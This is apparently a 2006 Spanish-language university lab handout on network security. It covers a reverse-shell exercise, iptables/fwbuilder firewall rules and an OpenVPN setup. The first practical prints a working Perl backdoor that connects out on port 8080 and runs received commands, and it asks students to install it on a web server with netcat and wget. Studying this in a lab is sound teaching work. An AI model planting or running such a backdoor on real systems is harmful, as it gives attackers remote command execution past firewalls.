Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Seguridad en Redes
Seguridad en Redes - página 2/9
1 Tabla de Contenidos
1 Propósito....................................................................................................................3
2 Convenciones.............................................................................................................4
3 Prácticas ....................................................................................................................4
3.1 Práctica 1 – Acceso a shell en forma reversa.......................................................4
3.1.1 Objetivos......................................................................................................4
3.1.2 Herramientas................................................................................................4
3.1.3 Presentación.................................................................................................4
3.1.4 Escenario......................................................................................................5
3.1.5 Guía de la práctica.......................................................................................5
3.2 Práctica 2 - Firewall.............................................................................................6
3.2.1 Objetivos......................................................................................................6
3.2.2 Herramientas................................................................................................6
3.2.3 Escenario......................................................................................................6
3.2.4 Presentación.................................................................................................6
3.2.5 Guía de la práctica.......................................................................................7
3.3 Práctica 3 – Virtual Private Network....................................................................8
3.3.1 Objetivos......................................................................................................8
3.3.2 Herramientas................................................................................................8
3.3.3 Escenario......................................................................................................8
3.3.4 Presentación.................................................................................................8
3.3.5 Guía de la práctica.......................................................................................8
4 Forma de Entrega.......................................................................................................9
5 Referencias.................................................................................................................9
1 Propósito
El propósito de las prácticas descritas en este documento es introducir a los
participantes en los problemas relacionados con la seguridad en redes.
2 Convenciones
dir_ip www.fing.edu.uy/inco/cursos/fsi/laboratorio/lab3
3 Prácticas
3.1.1 Objetivos
Mostrar las posibles debilidades generadas cuando no se utiliza filtrado de paquetes
salientes en los firewalls
3.1.2 Herramientas
• netcat [Ncat06]
• perl [Perl06]
• Servidor web apache [Http06]
3.1.3 Presentación
Es común encontrar ataques remotos que generan acceso a una shell. En muchas
ocasiones el mecanismo utilizado es levantar un puerto en el equipo atacado donde
atiende una shell. El atacante tiene solamente que conectarse a ese puerto y lograr el
acceso.
Debido a la proliferación de firewalls, este tipo de ataques queda bastante limitado ya
que generalmente se filtran los accesos a puertos no estándares.
Un mecanismo de obtener una shell remota es que el equipo atacante sea el que
genere el pedido de conexión hacia afuera. Los firewalls por lo general admiten
accesos salientes a puertos estándares (21, 22, 25, 80, etc).
En este laboratorio veremos la obtención de una shell remota en donde el inicio de la
conexión es por parte del equipo atacado. De esa forma, podremos evadir los firewalls
ya que es la red interna atacada el que inicia la conexión a un puerto estándar del
equipo atacante.
3.1.4 Escenario
Máquina con netcat instalado
Máquina con servidor web apache instalado.
#!/usr/bin/perl
use Net::Telnet ();
use Net::Telnet;
($ip) = @ARGV;
print("$ip\n");
$telnet = new Net::Telnet ( Timeout=>30, Port=>8080);
$telnet->open($ip);
$count=1;
$telnet->print('Acceso desde equipo remoto');
$pattern='/\$ $/i';
while ($count == 1) {
$data = $telnet->get(Timeout=>100);
$output = `$data`;
$telnet->print($output);
}
exit 0
Tener muy presente que esta disponible en el sitio web del curso:
http://www.fing.edu.uy/inco/cursos/fsi/laboratorio/lab3/practica1/exploit.pl
Resultados esperados:
a) Instalación de un backdoor en el servidor web (el backdoor es el script que
permite establecer la conexión reversa). Explique detalladamente cuales fueron
los pasos para instalar el backdoor y el lugar de la instalación.
b) Explicación detallada de como se ejecuta el backdoor instalado en el servidor
web.
Sugerencias:
Averiguar que es una shell remota.
Utilizar el comando netcat (nc) en la ejecución del backdoor.
Puede ser de utilidad el comando wget para bajar cosas de un sitio web
3.2.1 Objetivos
Afirmar los conocimientos sobre firewalls.
3.2.2 Herramientas
• Iptables [Ipta06]
3.2.3 Escenario
Equipo con sistema operativo linux que tiene instalados iptables y fwbuilder.
3.2.4 Presentación
Iptables se lo conoce como el firewall de linux y en esencia se puede definir como:
“un conjunto de comandos que permiten decirle al kernel qué hacer con ciertos
paquetes que cumplan con ciertas características”. El módulo del kernel asociado a
estos comandos es netfilter [Netf06].
Estos módulos están integrados al sistema operativo desde la versión 2.4. Iptables es
el sucesor de ipchains y sus principales características son:
• stateless packet filtering
• stateful packet filtering
• NAT
También se puede consultar el libro “Linux Firewalls Second Edition” [Zieg01].
Fwbuilder (firewall builder) es una herramienta de configuración y manejo de firewalls.
Está compuesto de una interfaz gráfica y un conjunto de compiladores de políticas.
Existen compiladores de políticas para varias plataformas, por ejemplo: iptables,
ipfilter, cisco PIX y mediante un sistema de plugins se pueden crear nuevos
compiladores.
Permite al administrador manejar un conjunto de firewalls de forma centralizada,
además, el lenguaje de alto nivel para escribir las reglas permite una mayor claridad
al momento de administrar las políticas de la empresa.
Entregable:
En el directorio practica2:
– el archivo con la configuración generada por la herramienta (fw-
lab3.fwb)
– un archivo de texto con la lista de reglas de iptables generadas y una
3.3.1 Objetivos
• Este laboratorio tiene como objetivo experimentar en el armado y la
configuración de una VPN.
3.3.2 Herramientas
• OpenVPN (como ejemplo de VPN sobre SSL) [Opvp06]
• OpenSSL [Opss06]
3.3.3 Escenario
Equipo con sistema operativo linux y openvpn instalado.
Servidor linux con openvpn instalado y configurado.
3.3.4 Presentación
OpenVPN es una herramienta de código abierto que permite el armado de redes
privadas virtuales. Utiliza el protocolo SSL/TLS y soporta diferentes métodos de
autenticación, como certificados, clave compartida y smart cards.
En este laboratorio armaremos una VPN entre dos equipos, uno actuará como servidor
y el otro como cliente. Utilizaremos certificados para la autenticación del cliente y el
servidor. Para ello se necesitará generar un certificado para cada uno y el certificado
de una entidad certificadora (CA) que será utilizado para firmar los certificados del
cliente y el servidor. El cliente autenticará el certificado del servidor y el servidor el
certificado del cliente, verificando primero si el certificado fue firmado por la CA y
luego el contenido del certificado, como ser el common name o el tipo.
4 Forma de Entrega
Se debe entregar el archivo entrega3.tar.gz conteniendo los tres
directorios creados en cada práctica y sus correspondientes archivos.
La página de entrega es: http://www.fing.edu.uy/inco/cursos/fsi/entrega.php
5 Referencias
[Ncat06] Networking utility, http://netcat.sourceforge.net/ (Noviembre 2006).
[Perl06] Lenguaje de programación interpretado, http://www.perl.com/
(Noviembre 2006)
[Http06] Open-source HTTP server, http://httpd.apache.org/ (Noviembre 2006)
[Ipta06] Netfilter, Iptables - Command line program to configure packet filtering
ruleset, http://www.netfilter.org/projects/iptables/index.html (Noviembre
2006).
[Netf06] Netfilter, Packet filtering framework inside theLinux 2.4.x and 2.6.x kernel
series, http://www.netfilter.org/ (Noviembre 2006).
[Zieg01] Robet L. Ziegler, Carl B. Constantine, Linux Firewalls Second Edition,
Noviembre 2001.
[Opvp06] OpenVPN Solutions, SSL VPN solution , http://openvpn.net/ (Noviembre
2006)
[Opss06] OpenSSL, Secure Sockets Layer and Transport Layer Security,
http://www.openssl.org/, (Noviembre 2006)